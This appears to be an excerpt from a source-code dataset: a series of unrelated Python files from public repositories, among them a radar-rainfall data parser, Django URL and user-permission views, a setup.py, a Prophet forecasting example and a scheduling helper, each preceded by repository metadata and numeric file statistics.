extensions = ["sphinx.ext.autodoc", "sphinxcontrib.apidoc"]
templates_path = ["_templates"]
exclude_patterns = []
html_theme = "alabaster"
html_static_path = ["_static"]
apidoc_module_dir = "../../src"
apidoc_toc_file = False
| 22.526316 | 59 | 0.752336 | 51 | 428 | 6.078431 | 0.72549 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016043 | 0.126168 | 428 | 18 | 60 | 23.777778 | 0.812834 | 0.130841 | 0 | 0 | 0 | 0 | 0.275676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876f9687ce17964a9b95e1f021971cdbe5981ac3 | 6,888 | py | Python | utils/cwbqpe.py | tingsyo/qpetw | e0f87a401649b367506370beeffaeffcc9484407 | [
"Unlicense"
] | null | null | null | utils/cwbqpe.py | tingsyo/qpetw | e0f87a401649b367506370beeffaeffcc9484407 | [
"Unlicense"
] | null | null | null | utils/cwbqpe.py | tingsyo/qpetw | e0f87a401649b367506370beeffaeffcc9484407 | [
"Unlicense"
] | null | null | null | import os, gzip, struct
import numpy as np
class cwbqpe:
'''Class for processing CWB pre-QC QPE data.'''
def __init__(self, file=None, data=None):
self.uri = file
self.header = None
self.data = data
def help(self):
print("This toolset provides functions accessing CWB QPESUMS data. \nThe data is 494972 bytes binary stored in gzip format. The first 170 bytes is the header, and the latter part is the QPE results on a (441x561) surface.\n")
def load_data(self, file=None):
# Check data file
if (self.uri is None):
if (file is None) or (not os.path.isfile(file)):
print('[Error] The data file is not specified or does not exist.')
return(None)
else:
self.uri = file
# Load data
with gzip.open(self.uri, 'rb') as f:
raw = f.read()
# Parse header
self.header = self.parse_header(raw[:170])
self.data = np.array(struct.unpack('247401h', raw[170:])).reshape(self.header['ny'], self.header['nx'])
# Scale data
self.data = np.round(self.data/self.header['var_scale'], 1)
return(0)
def parse_header(self, raw):
header = {}
# Time information
header['year'] = struct.unpack('i', raw[:4])[0]
header['month'] = struct.unpack('i', raw[4:8])[0]
header['day'] = struct.unpack('i', raw[8:12])[0]
header['hour'] = struct.unpack('i', raw[12:16])[0]
header['minute'] = struct.unpack('i', raw[16:20])[0]
header['second'] = struct.unpack('i', raw[20:24])[0]
# Data dimension
header['nx'] = struct.unpack('i', raw[24:28])[0]
header['ny'] = struct.unpack('i', raw[28:32])[0]
header['nz'] = struct.unpack('i', raw[32:36])[0]
# Projection and lat/lon
header['proj'] = struct.unpack('4s', raw[36:40])[0].decode('ISO-8859-1')
header['map_scale'] = struct.unpack('i', raw[40:44])[0]
header['projlat1'] = struct.unpack('i', raw[44:48])[0]
header['projlat2'] = struct.unpack('i', raw[48:52])[0]
header['projlon'] = struct.unpack('i', raw[52:56])[0]
header['alon'] = struct.unpack('i', raw[56:60])[0]
header['alat'] = struct.unpack('i', raw[60:64])[0]
# Delta in x-y-z
header['pxy_scale'] = struct.unpack('i', raw[64:68])[0]
header['dx'] = struct.unpack('i', raw[68:72])[0]
header['dy'] = struct.unpack('i', raw[72:76])[0]
header['dxy_scale'] = struct.unpack('i', raw[76:80])[0]
header['zht'] = struct.unpack('i', raw[80:84])[0]
header['z_scale'] = struct.unpack('i', raw[84:88])[0]
header['i_bb_mode'] = struct.unpack('i', raw[88:92])[0]
# Quality information
unkn01,unkn02,unkn03,unkn04,unkn05,unkn06,unkn07,unkn08,unkn09 = struct.unpack('iiiiiiiii', raw[92:128])
# Variable information
header['varname'] = struct.unpack('20s', raw[128:148])[0].decode('ISO-8859-1')
header['varunit'] = struct.unpack('6s', raw[148:154])[0].decode('ISO-8859-1')
header['var_scale'] = struct.unpack('i', raw[154:158])[0]
header['missing'] = struct.unpack('i', raw[158:162])[0]
header['nradar'] = struct.unpack('i', raw[162:166])[0]
header['mosradar'] = struct.unpack('4s', raw[166:170])[0].decode('ISO-8859-1')
#
return(header)
def find_nearest_value(self, lon, lat):
''' Find the closest point in the dataset to the specified lon/lat.'''
# Check data file
if (self.header is None):
print('[Error] The object has not yet been initialized.')
return(None)
# Derive the coordinate of the data object
lon0 = self.header['alon']/self.header['map_scale']
lat1 = self.header['alat']/self.header['map_scale']
dx = self.header['dx']/self.header['dxy_scale']
dy = self.header['dy']/self.header['dxy_scale']
lon1 = lon0 + (self.header['nx']-1)*dx
lat0 = lat1 - (self.header['ny']-1)*dy
lons = np.linspace(lon0, lon1, self.header['nx'])
lats = np.linspace(lat0, lat1, self.header['ny'])
# Check boundaries
if (lon<lon0) or (lon>lon1) or (lat<lat0) or (lat>lat1):
print("Specified lon/lat is outside of the data boundary: "+
str(lon0)+"~"+str(lon1)+", "+str(lat0)+"~"+str(lat1))
return(None)
# Find neighbors
ilonr = np.where(lons>lon)[0][0]
ilonl = np.where(lons<=lon)[0][-1]
ilatu = np.where(lats>lat)[0][0]
ilatd = np.where(lats<=lat)[0][-1]
# Determin the closest point
if (lon - lons[ilonl]) <= (lons[ilonr] - lon):
ilon = ilonl
else:
ilon = ilonr
if (lat - lats[ilatd]) <= (lats[ilatu] - lat):
ilat = ilatd
else:
ilat = ilatu
#
return((lons[ilon], lats[ilat], self.data[ilat,ilon]))
def find_interpolated_value(self, lon, lat):
''' Find the closest points and interpolate to the specified lon/lat.'''
# Check data file
if (self.header is None):
print('[Error] The object has not yet been initialized.')
return(None)
# Derive the coordinate of the data object
lon0 = self.header['alon']/self.header['map_scale']
lat1 = self.header['alat']/self.header['map_scale']
dx = self.header['dx']/self.header['dxy_scale']
dy = self.header['dy']/self.header['dxy_scale']
lon1 = lon0 + (self.header['nx']-1)*dx
lat0 = lat1 - (self.header['ny']-1)*dy
lons = np.linspace(lon0, lon1, self.header['nx'])
lats = np.linspace(lat0, lat1, self.header['ny'])
# Check boundaries
if (lon<lon0) or (lon>lon1) or (lat<lat0) or (lat>lat1):
print("Specified lon/lat is outside of the data boundary: "+
str(lon0)+"~"+str(lon1)+", "+str(lat0)+"~"+str(lat1))
return(None)
# Find neighbors
ilonr = np.where(lons>lon)[0][0]
ilonl = np.where(lons<=lon)[0][-1]
ilatu = np.where(lats>lat)[0][0]
ilatd = np.where(lats<=lat)[0][-1]
# Interpolate
def bilinear_interpolation(x, y, x1, x2, y1, y2, z):
'''Bilinear interpolation, ref:https://en.wikipedia.org/wiki/Bilinear_interpolation'''
A = np.array([[1,x1,y1,x1*y1],[1,x1,y2,x1*y2],[1,x2,y1,x2*y1],[1,x2,y2,x2*y2]])
a = np.linalg.solve(A,z)
fxy = a[0] + a[1]*x + a[2]*y + a[3]*x*y
return(fxy)
#
neighbours = [self.data[ilatd,ilonl], self.data[ilatu,ilonl], self.data[ilatd,ilonr], self.data[ilatu,ilonr]]
value = bilinear_interpolation(lon, lat, lons[ilonl], lons[ilonr], lats[ilatd], lats[ilatu], neighbours)
return(value)
| 47.178082 | 233 | 0.558072 | 970 | 6,888 | 3.931959 | 0.228866 | 0.08128 | 0.085212 | 0.104877 | 0.402202 | 0.356843 | 0.340325 | 0.325118 | 0.325118 | 0.325118 | 0 | 0.061629 | 0.260308 | 6,888 | 145 | 234 | 47.503448 | 0.686948 | 0.091609 | 0 | 0.392857 | 0 | 0.008929 | 0.138281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.017857 | 0 | 0.089286 | 0.053571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87717e4313134831e035a396909646739e4f9b6f | 676 | py | Python | main.py | SuperGarryGamer/open-salami | 82c77cfe32718da49cdfdbfdba668b278be80924 | [
"BSD-3-Clause"
] | null | null | null | main.py | SuperGarryGamer/open-salami | 82c77cfe32718da49cdfdbfdba668b278be80924 | [
"BSD-3-Clause"
] | null | null | null | main.py | SuperGarryGamer/open-salami | 82c77cfe32718da49cdfdbfdba668b278be80924 | [
"BSD-3-Clause"
] | null | null | null | import time
import uasyncio
from machine import Pin
import driver
FRAMERATE = 30
BOUNCE_DELAY = 0.05
DISPLAY = driver.Display(0x3C)
last_bounce_time = 0
DISPLAY.draw_bitmap(0, 0, '/title.pbm')
pointer_spr = driver.Sprite(DISPLAY, 30, 42)
pointer_spr.load_from_pbm('/pointer.pbm')
DISPLAY.on()
A_PIN = Pin(0, Pin.IN)
B_PIN = Pin(1, Pin.IN)
buttons = [False, False]
# def get_button_inputs():
# buttons_old = buttons
# buttons = [A_PIN.value(), B_PIN.value()]
async def draw_disp():
DISPLAY.draw()
async def main():
while True:
print(A_PIN.value())
uasyncio.create_task(draw_disp())
time.sleep(1/FRAMERATE)
uasyncio.run(main()) | 18.27027 | 46 | 0.686391 | 103 | 676 | 4.320388 | 0.466019 | 0.026966 | 0.040449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030521 | 0.176036 | 676 | 37 | 47 | 18.27027 | 0.768402 | 0.140533 | 0 | 0 | 0 | 0 | 0.038062 | 0 | 0 | 0 | 0.00692 | 0 | 0 | 1 | 0 | false | 0 | 0.173913 | 0 | 0.173913 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87719faaac0b9d47604da6e340200e1581603f56 | 1,098 | py | Python | setup.py | hrpzcf/vidtoch | f7ef0253437223be9a6a1a6687bb0aec469738f2 | [
"MIT"
] | 1 | 2021-12-27T08:27:01.000Z | 2021-12-27T08:27:01.000Z | setup.py | hrpzcf/vidtoch | f7ef0253437223be9a6a1a6687bb0aec469738f2 | [
"MIT"
] | null | null | null | setup.py | hrpzcf/vidtoch | f7ef0253437223be9a6a1a6687bb0aec469738f2 | [
"MIT"
] | null | null | null | # coding: utf-8
from setuptools import find_packages, setup
from vidtoch import AUTHOR, EMAIL, NAME, VERSION, WEBSITE
description = "一个帮你将视频转为字符视频的模块。"
try:
with open("README.md", "r", encoding="utf-8") as mdfile:
long_description = mdfile.read()
except Exception:
long_description = description
setup(
name=NAME,
version=VERSION,
author=AUTHOR,
author_email=EMAIL,
maintainer=AUTHOR,
maintainer_email=EMAIL,
url=WEBSITE,
description=description,
long_description=long_description,
long_description_content_type="text/markdown",
license="MIT License",
packages=find_packages(),
install_requires=["opencv-python", "imgtoch>=0.2.2"],
python_requires=">=3.7",
classifiers=[
"Intended Audience :: Developers",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
keywords=["character video", "video", "character"],
)
| 28.153846 | 60 | 0.659381 | 119 | 1,098 | 5.97479 | 0.529412 | 0.105485 | 0.109705 | 0.109705 | 0.078762 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01611 | 0.208561 | 1,098 | 38 | 61 | 28.894737 | 0.802071 | 0.01184 | 0 | 0 | 0 | 0 | 0.301939 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060606 | 0 | 0.060606 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8772a816426c89d517e6ce3effa48bd93c2dd2bb | 433 | py | Python | appg/api_messages.py | poxstone/appg | fe59b83d0f497e7d6033bde601bb1f61c95aba0c | [
"CNRI-Python",
"Condor-1.1",
"Naumen",
"Linux-OpenIB",
"MS-PL"
] | null | null | null | appg/api_messages.py | poxstone/appg | fe59b83d0f497e7d6033bde601bb1f61c95aba0c | [
"CNRI-Python",
"Condor-1.1",
"Naumen",
"Linux-OpenIB",
"MS-PL"
] | null | null | null | appg/api_messages.py | poxstone/appg | fe59b83d0f497e7d6033bde601bb1f61c95aba0c | [
"CNRI-Python",
"Condor-1.1",
"Naumen",
"Linux-OpenIB",
"MS-PL"
] | null | null | null | from protorpc import messages
import endpoints
class Greeting(messages.Message):
"""Greeting that stores a message."""
message = messages.StringField(1)
class GreetingCollection(messages.Message):
"""Collection of Greetings."""
items = messages.MessageField(Greeting, 1, repeated=True)
STORED_GREETINGS = GreetingCollection(items=[
Greeting(message='hello world!'),
Greeting(message='goodbye world!'),
]) | 25.470588 | 61 | 0.734411 | 45 | 433 | 7.044444 | 0.555556 | 0.094637 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005391 | 0.143187 | 433 | 17 | 62 | 25.470588 | 0.849057 | 0.12933 | 0 | 0 | 0 | 0 | 0.070845 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87738f3cbba8bb6fb3bd35ef57cb06f1d963828d | 508 | py | Python | minizoo/templates/codes/prophet.py | kasey-/minizoo | 4b24ab0b5760c0ac3f9b6e4c47f1bf6c4ca7bb1a | [
"Unlicense"
] | null | null | null | minizoo/templates/codes/prophet.py | kasey-/minizoo | 4b24ab0b5760c0ac3f9b6e4c47f1bf6c4ca7bb1a | [
"Unlicense"
] | 4 | 2020-07-16T17:59:25.000Z | 2022-02-12T06:33:52.000Z | minizoo/templates/codes/prophet.py | kasey-/minizoo | 4b24ab0b5760c0ac3f9b6e4c47f1bf6c4ca7bb1a | [
"Unlicense"
] | null | null | null | #Source: https://facebook.github.io/prophet/docs/quick_start.html
import pandas as pd
from fbprophet import Prophet
df = pd.read_csv('./example_wp_log_peyton_manning.csv')
df = df.rename(columns={df.columns[0]:"ds", df.columns[1]:"y"})
df.head()
m = Prophet()
m.fit(df)
future = m.make_future_dataframe(periods=365)
future.tail()
forecast = m.predict(future)
forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail()
fig1 = m.plot(forecast)
fig2 = m.plot_components(forecast)
fig1.show()
fig2.show()
| 22.086957 | 65 | 0.724409 | 81 | 508 | 4.407407 | 0.604938 | 0.05042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019523 | 0.09252 | 508 | 22 | 66 | 23.090909 | 0.754881 | 0.125984 | 0 | 0 | 0 | 0 | 0.14447 | 0.079007 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87798b38a92c9bf4f78ce7b360d570618511a1be | 1,371 | py | Python | config/urls.py | gurnitha/2022-django-eshopper | eb570215fffb67f1061cb1c32f9dd16a9dfc9f52 | [
"Unlicense"
] | null | null | null | config/urls.py | gurnitha/2022-django-eshopper | eb570215fffb67f1061cb1c32f9dd16a9dfc9f52 | [
"Unlicense"
] | null | null | null | config/urls.py | gurnitha/2022-django-eshopper | eb570215fffb67f1061cb1c32f9dd16a9dfc9f52 | [
"Unlicense"
] | null | null | null | # confit/urls.py
# Django modules
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include
# Django locals
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('shop.urls')),
path('', include('blog.urls')),
path('', include('users.urls')),
# Accounts
path('accounts/', include('django.contrib.auth.urls')),
# admin/
# [name='index']
# products/ [name='products']
# product/1 [name='product_detail']
# cart/ [name='cart']
# contact/ [name='contact']
# posts/ [name='posts']
# post/1 [name='post_detail']
# signup/ [name='signup']
# logout/ [name='logout']
# accounts/ login/ [name='login']
# accounts/ logout/ [name='logout']
# accounts/ password_change/ [name='password_change']
# accounts/ password_change/done/ [name='password_change_done']
# accounts/ password_reset/ [name='password_reset']
# accounts/ password_reset/done/ [name='password_reset_done']
# accounts/ reset/<uidb64>/<token>/ [name='password_reset_confirm']
# accounts/ reset/done/ [name='password_reset_complete']
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | 32.642857 | 82 | 0.673961 | 161 | 1,371 | 5.602484 | 0.304348 | 0.079823 | 0.075388 | 0.053215 | 0.05765 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003475 | 0.160467 | 1,371 | 42 | 83 | 32.642857 | 0.780191 | 0.504012 | 0 | 0 | 0 | 0 | 0.101824 | 0.036474 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
877a802a5b8ecdef04600c8ce73a6b2f8a7bbe52 | 1,327 | py | Python | tests/transformers/add_key_values_test.py | santunioni/transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | 1 | 2022-02-21T22:15:08.000Z | 2022-02-21T22:15:08.000Z | tests/transformers/add_key_values_test.py | santunioni/Transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | null | null | null | tests/transformers/add_key_values_test.py | santunioni/Transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | null | null | null | from typing import Any, Dict
import pytest
from transformer.transformers.add_key import AddKeyValues, AddKeyValuesConfig
@pytest.fixture()
def target_data(data):
t = data.copy()
t.update(
{
"a_a-value": True,
"b_b-value": "a-value_b-value",
}
)
return t
def test_add_placeholder(data, target_data):
key_values = {"a_${a}": True, "b_${b}": "${a}_${b}"}
adder = AddKeyValues(config=AddKeyValuesConfig(key_values=key_values))
transformed_data, _ = adder.transform(data, {})
assert target_data == transformed_data
def test_empiricus_dinamize_manipulation():
"""
Essa teste testa a demanda que nos passaram sobre como manipular dados que vão parar no Dinamize, para
a esteira da Empiricus.
"""
data: Dict[str, Any] = {
"plan_type": "BOLSA",
"proposal_status": "Aprovado",
}
target_data: Dict[str, Any] = {
**data,
"plan_type_bolsa": True,
"proposal_status_bolsa": True,
}
transformer_config = AddKeyValuesConfig(
key_values={
"plan_type_${plan_type}": True,
"proposal_status_${plan_type}": True,
},
)
adder = AddKeyValues(config=transformer_config)
new_data, _ = adder.transform(data, {})
assert new_data == target_data
| 26.54 | 106 | 0.629239 | 154 | 1,327 | 5.155844 | 0.38961 | 0.062972 | 0.015113 | 0.083123 | 0.070529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.248681 | 1,327 | 49 | 107 | 27.081633 | 0.796389 | 0.094951 | 0 | 0 | 0 | 0 | 0.149873 | 0.060119 | 0 | 0 | 0 | 0 | 0.054054 | 1 | 0.081081 | false | 0 | 0.081081 | 0 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e3fb62f1b3bbafa427fe26bd9b2c0bfdf528e3c | 2,048 | py | Python | sys_app/views/user.py | sf0402/horse-admin | dd3f5c2d317763a1daeef40ce7833371e6ed5ce0 | [
"MIT"
] | 6 | 2019-12-17T03:16:38.000Z | 2020-07-10T10:45:24.000Z | sys_app/views/user.py | fearlessfei/horse-admin | dd3f5c2d317763a1daeef40ce7833371e6ed5ce0 | [
"MIT"
] | 5 | 2021-03-19T01:10:11.000Z | 2022-02-10T13:37:29.000Z | sys_app/views/user.py | sf0402/horse-admin | dd3f5c2d317763a1daeef40ce7833371e6ed5ce0 | [
"MIT"
] | 1 | 2020-11-10T07:54:52.000Z | 2020-11-10T07:54:52.000Z | # *-* coding: utf-8 *-*
from django.contrib.auth import get_user_model
from .base import AuthAPIViewSet
from utils.perm import HasPerm
from sys_app.serializers.user import UserSerializer
User = get_user_model()
class userViewSet(AuthAPIViewSet):
"""
用户视图集
"""
queryset = User.objects.all()
serializer_class = UserSerializer
def perform_create(self, serializer):
serializer.save(creator=self.request.user)
def get_queryset(self):
queryset = super(self.__class__, self).get_queryset()
if not self.request.user.is_superuser:
user_id = self.request.user.id
queryset = queryset.filter(creator=user_id) | queryset.filter(id=user_id)
return queryset
@HasPerm(perm_code='sys:user:select')
def list(self, request, *args, **kwargs):
super(self.__class__, self).list(request, *args, **kwargs)
@HasPerm(perm_code='sys:user:create')
def create(self, request, *args, **kwargs):
if not request.user.is_superuser and request.data['is_superuser']:
raise self.response.Fail(message="您不是超级管理员不能设置用户为超级管理员!")
super(self.__class__, self).create(request, *args, **kwargs)
@HasPerm(perm_code='sys:user:edit')
def update(self, request, pk=None, *args, **kwargs):
if not request.user.is_superuser:
if request.data['is_superuser']:
raise self.response.Fail(message="您不是超级管理员不能设置用户为超级管理员!")
queryset = self.get_queryset()
if not queryset.filter(id=pk):
raise self.response.Fail(message="不能修改非自己创建的用户")
super(self.__class__, self).update(request, pk, *args, **kwargs)
@HasPerm(perm_code='sys:user:delete')
def destroy(self, request, pk=None, *args, **kwargs):
if not request.user.is_superuser:
queryset = self.get_queryset()
if not queryset.filter(id=pk):
raise self.response.Fail(message="不能删除非自己创建的用户")
super(self.__class__, self).destroy(request, pk, *args, **kwargs)
| 35.310345 | 85 | 0.657227 | 248 | 2,048 | 5.25 | 0.25 | 0.061444 | 0.053763 | 0.069124 | 0.449309 | 0.417051 | 0.417051 | 0.392473 | 0.304147 | 0.304147 | 0 | 0.000622 | 0.214844 | 2,048 | 57 | 86 | 35.929825 | 0.80908 | 0.013672 | 0 | 0.2 | 0 | 0 | 0.073852 | 0.020958 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.1 | 0 | 0.35 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e408b3e9e6971147d3597ad584a01e192b436c3 | 1,602 | py | Python | crslab/system/utils/functions.py | Zyh716/WSDM2022-C2CRS | 8ef2fa7c44bdba1799ab79f379ae7394bd468c02 | [
"MIT"
] | 4 | 2022-03-24T02:14:50.000Z | 2022-03-30T02:28:19.000Z | crslab/system/utils/functions.py | RUCAIBox/WSDM2022-C2CRS | 8ef2fa7c44bdba1799ab79f379ae7394bd468c02 | [
"MIT"
] | null | null | null | crslab/system/utils/functions.py | RUCAIBox/WSDM2022-C2CRS | 8ef2fa7c44bdba1799ab79f379ae7394bd468c02 | [
"MIT"
] | 2 | 2022-03-23T02:24:24.000Z | 2022-03-28T12:45:43.000Z | # @Time : 2020/11/22
# @Author : Kun Zhou
# @Email : francis_kun_zhou@163.com
# UPDATE:
# @Time : 2020/11/24, 2020/12/18
# @Author : Kun Zhou, Xiaolei Wang
# @Email : francis_kun_zhou@163.com, wxl1999@foxmail.com
import torch
def compute_grad_norm(parameters, norm_type=2.0):
"""
Compute norm over gradients of model parameters.
:param parameters:
the model parameters for gradient norm calculation. Iterable of
Tensors or single Tensor
:param norm_type:
type of p-norm to use
:returns:
the computed gradient norm
"""
if isinstance(parameters, torch.Tensor):
parameters = [parameters]
parameters = [p for p in parameters if p is not None and p.grad is not None]
total_norm = 0
for p in parameters:
param_norm = p.grad.data.norm(norm_type)
total_norm += param_norm.item() ** norm_type
return total_norm ** (1.0 / norm_type)
def ind2txt(inds, ind2tok, end_token_idx=None, unk_token='unk'):
sentence = []
for ind in inds:
if isinstance(ind, torch.Tensor):
ind = ind.item()
if end_token_idx and ind == end_token_idx:
break
sentence.append(ind2tok.get(ind, unk_token))
return ' '.join(sentence)
def ind2txt2(inds, ind2tok, end_token_idx=None, unk_token='unk'):
sentence = []
for ind in inds:
if isinstance(ind, torch.Tensor):
ind = ind.item()
if end_token_idx and ind == end_token_idx:
break
sentence.append(ind2tok.get(ind, unk_token))
return ' '.join(sentence), sentence | 29.666667 | 80 | 0.639201 | 224 | 1,602 | 4.428571 | 0.330357 | 0.048387 | 0.066532 | 0.038306 | 0.415323 | 0.415323 | 0.364919 | 0.364919 | 0.364919 | 0.364919 | 0 | 0.038655 | 0.257179 | 1,602 | 54 | 81 | 29.666667 | 0.794958 | 0.285268 | 0 | 0.5 | 0 | 0 | 0.007299 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0.035714 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4320c42b205cf8fac729bae60ca26c77a94436 | 2,149 | py | Python | time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | null | null | null | time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | null | null | null | time_window_generator.py | alphagov/blocker | 7de98d38bf52e23d9a29c9cea2d956333b28f2dc | [
"MIT"
] | 2 | 2020-08-12T20:38:39.000Z | 2021-04-10T19:30:16.000Z | #!/usr/bin/env python
from datetime import datetime, timedelta, time
from day import Day
from window import Window
__author__ = "Aditya Pahuja"
__copyright__ = "Copyright (c) 2020"
__maintainer__ = "Aditya Pahuja"
__email__ = "aditya.s.pahuja@gmail.com"
__status__ = "Production"
class TimeWindowGenerator:
def __init__(self, days, start_time, stop_time, time_zone):
self.days = set()
for day in days:
self.days.add(Day[day].value)
self.start_time = start_time
self.stop_time = stop_time
self.time_zone = time_zone
def get_window_of_time(self, current_date):
if current_date.weekday() in self.days:
current_time = time(current_date.hour, current_date.minute, current_date.second, current_date.microsecond, self.time_zone)
if current_time > self.stop_time:
return self.get_next_window_of_time(current_date)
else:
return self.get_today_window_of_time(current_date)
else:
return self.get_next_window_of_time(current_date)
def get_next_window_of_time(self, window_date):
window_date = window_date + timedelta(1)
while window_date.weekday() not in self.days:
window_date = window_date + timedelta(1)
return self.get_today_window_of_time(window_date)
def get_today_window_of_time(self, window_date):
window_start_date = datetime(window_date.year, window_date.month, window_date.day,
self.start_time.hour, self.start_time.minute, self.start_time.second,
self.start_time.microsecond)
window_start_date = self.time_zone.localize(window_start_date, is_dst=True)
window_stop_date = datetime(window_date.year, window_date.month, window_date.day,
self.stop_time.hour, self.stop_time.minute, self.stop_time.second,
self.stop_time.microsecond)
window_stop_date = self.time_zone.localize(window_stop_date, is_dst=True)
return Window(window_start_date, window_stop_date)
| 42.137255 | 134 | 0.672871 | 283 | 2,149 | 4.70318 | 0.215548 | 0.105184 | 0.06311 | 0.036063 | 0.351615 | 0.340346 | 0.254696 | 0.180316 | 0.180316 | 0.087153 | 0 | 0.003713 | 0.248022 | 2,149 | 50 | 135 | 42.98 | 0.819926 | 0.009307 | 0 | 0.15 | 0 | 0 | 0.037124 | 0.011748 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.075 | 0 | 0.325 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e4538ae3c50b4c457a9fa19bf22b5b1a7b666ee | 1,976 | py | Python | tests/test_numeric_batchnorm_v2.py | DTennant/Synchronized-BatchNorm-PyTorch | 8cba183f50b630b1c8baa33ddb2fafac61219acd | [
"MIT"
] | 1,443 | 2018-01-27T12:35:13.000Z | 2022-03-31T07:17:45.000Z | tests/test_numeric_batchnorm_v2.py | DTennant/Synchronized-BatchNorm-PyTorch | 8cba183f50b630b1c8baa33ddb2fafac61219acd | [
"MIT"
